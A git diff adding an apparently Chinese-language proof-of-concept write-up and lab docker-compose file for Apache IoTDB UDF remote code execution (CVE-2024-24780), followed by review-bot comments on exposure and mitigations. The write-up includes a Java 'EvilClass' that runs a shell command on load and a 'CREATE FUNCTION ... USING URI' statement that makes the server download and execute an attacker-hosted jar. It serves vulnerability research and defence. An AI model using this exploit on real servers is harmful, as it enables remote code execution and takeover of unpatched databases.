diff --git a/base/iotdb/1.2.0/docker-compose.yml b/base/iotdb/1.2.0/docker-compose.yml new file mode 100644 index 0000000..dfd2eeb --- /dev/null +++ b/base/iotdb/1.2.0/docker-compose.yml @@ -0,0 +1,8 @@ +services: + iotdb: + image: apache/iotdb:1.2.0-standalone + container_name: iotdb + ports: + - "6667:6667" + - "31999:31999" + - "8181:8181" \ No newline at end of file diff --git a/数据库漏洞/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780.md b/数据库漏洞/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780.md new file mode 100644 index 0000000..da3b3ca --- /dev/null +++ b/数据库漏洞/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780.md 
@@ -0,0 +1,107 @@ +# Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780 + +## 漏洞描述 + +Apache IoTDB(物联网数据库)是支持收集、存储、管理与分析物联网时序数据的软件系统。CVE-2024-24780 中,攻击者在具有创建 UDF 的权限下可构造恶意请求造成远程代码执行,控制服务器。 + +IoTDB 支持两种方式加载 UDF(用户自定义函数): + +- 手动部署:将包含 UDF 的 JAR 包放置于每个节点的指定目录(如 `ext/udf)`。 +- URI 自动加载:在注册 UDF 时指定远程 URI,IoTDB 会自动从该地址下载 JAR 包并分发到集群中的各个节点。 + +攻击者可以通过 URI 自动加载的方式,指定一个恶意远程 URI。IoTDB 将从恶意远程 URI 加载包含恶意代码的 JAR 包,并分发到集群中的各个节点执行。 + +参考链接: + +- https://iotdb.apache.org/ +- http://www.openwall.com/lists/oss-security/2025/05/14/2 +- https://lists.apache.org/thread/xphtm98v3zsk9vlpfh481m1ry2ctxvmj + +## 漏洞影响 + +``` +1.0.0 <= Apache IoTDB < 1.3.4 +``` + +## 环境搭建 + +### 启动 IoTDB + +docker-compose.yml + +``` +services: + iotdb: + image: apache/iotdb:1.2.0-standalone + container_name: iotdb + ports: + - "6667:6667" + - "31999:31999" + - "8181:8181" +``` + +执行如下命令启动一个 Apache IoTDB 1.2.0 版本的服务器: + +``` +docker-compose up -d +``` + +查看启动情况: + +``` +docker ps +``` + +![](Public/Awesome-POC/数据库漏洞/images/Apache%20IoTDB%20UDF%20远程代码执行漏洞%20CVE-2024-24780/image-20250519141116383.png) + +### 安装 Cli 命令行 + +下载 [apache-iotdb-1.2.0-cli-bin.zip](https://archive.apache.org/dist/iotdb/1.2.0/): + +``` +wget https://archive.apache.org/dist/iotdb/1.2.0/apache-iotdb-1.2.0-cli-bin.zip +unzip apache-iotdb-1.2.0-cli-bin.zip +``` + +启动 Cli,命令行客户端是交互式的,如果一切就绪,我们可以看到欢迎标志和声明: + +``` +cd apache-iotdb-1.2.0-cli-bin/ +sbin/start-cli.sh -h your-ip -p 6667 -u root -pw root +``` + +![](Public/Awesome-POC/数据库漏洞/images/Apache%20IoTDB%20UDF%20远程代码执行漏洞%20CVE-2024-24780/image-20250519141502540.png) + +## 漏洞复现 + +编写类 `org.example.EvilClass`,将其编译为 `poc.jar`,将编译好的 jar 文件上传到 vps 进行托管。此处我们的恶意类中执行的命令是 `touch /tmp/awesome_poc`: + +```java +package org.example; + +public class EvilClass { + static { + try { + Runtime.getRuntime().exec("touch /tmp/awesome_poc"); + } catch (Exception e) { + e.printStackTrace(); + } + } +} +``` + +通过 URI 自动加载,在 IoTDB 中注册恶意 UDF: + +``` +CREATE FUNCTION evilFunc AS 'org.example.EvilClass' USING URI 
'http:///poc.jar'; +``` + +![](Public/Awesome-POC/数据库漏洞/images/Apache%20IoTDB%20UDF%20远程代码执行漏洞%20CVE-2024-24780/image-20250519142349138.png) + +IoTDB 会从我们的 vps 下载 `poc.jar`,加载恶意类并执行命令 。可以看到,`touch /tmp/awesome_poc` 已经执行成功: + +![](Public/Awesome-POC/数据库漏洞/images/Apache%20IoTDB%20UDF%20远程代码执行漏洞%20CVE-2024-24780/image-20250519142545665.png) + +## 漏洞修复 + +升级至 1.3.4 及以上版本。 diff --git a/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519141116383.png b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519141116383.png new file mode 100644 index 0000000..139afc4 Binary files /dev/null and b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519141116383.png differ diff --git a/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519141502540.png b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519141502540.png new file mode 100644 index 0000000..61c83ef Binary files /dev/null and b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519141502540.png differ diff --git a/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519142349138.png b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519142349138.png new file mode 100644 index 0000000..b17eda6 Binary files /dev/null and b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519142349138.png differ diff --git a/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519142545665.png b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519142545665.png new file mode 100644 index 0000000..30c7229 Binary files /dev/null and b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519142545665.png differ
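Review bot: In the `base/iotdb/1.2.0/docker-compose.yml` hunk, the `ports` mapping publishes 6667, 31999 and 8181 on every host interface, and the container runs with the image's default `root`/`root` credentials (the markdown hunk later logs in with `-u root -pw root`). Since this compose file stands up a deliberately vulnerable IoTDB 1.2.0 for a PoC, bind the ports to loopback (e.g. `- "127.0.0.1:6667:6667"`) or state in the README that the stack must only run on an isolated lab network, so that a copy-paste `docker-compose up -d` on a shared host does not expose an unpatched, default-credential database. Minor: the file ends without a trailing newline (`\ No newline at end of file`); add one to keep future diffs clean.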
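Review bot: In the `数据库漏洞/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780.md` hunk, the `CREATE FUNCTION ... USING URI 'http:///poc.jar'` statement has an empty host, which reads as a broken command rather than an intentional blank; use an explicit placeholder such as `http://<your-vps>/poc.jar` so readers know what to substitute. The 漏洞修复 section only says to upgrade to 1.3.4 or later, yet the 漏洞描述 already states the precondition that the attacker holds the privilege to create UDFs and the walkthrough logs in with the default `root`/`root` account; add those two operational mitigations to the fix section (grant UDF-creation privilege only to trusted accounts, change the default credentials, and keep 6667 off untrusted networks) so operators who cannot upgrade immediately have something to act on. Smaller points: the inline code span `ext/udf)` should close before the parenthesis (`ext/udf`), there is a stray space before the full stop in "执行命令 。", and the compose, shell and SQL fences are untagged while the Java fence is tagged `java`; tag them `yaml`, `shell` and `sql` for consistent rendering.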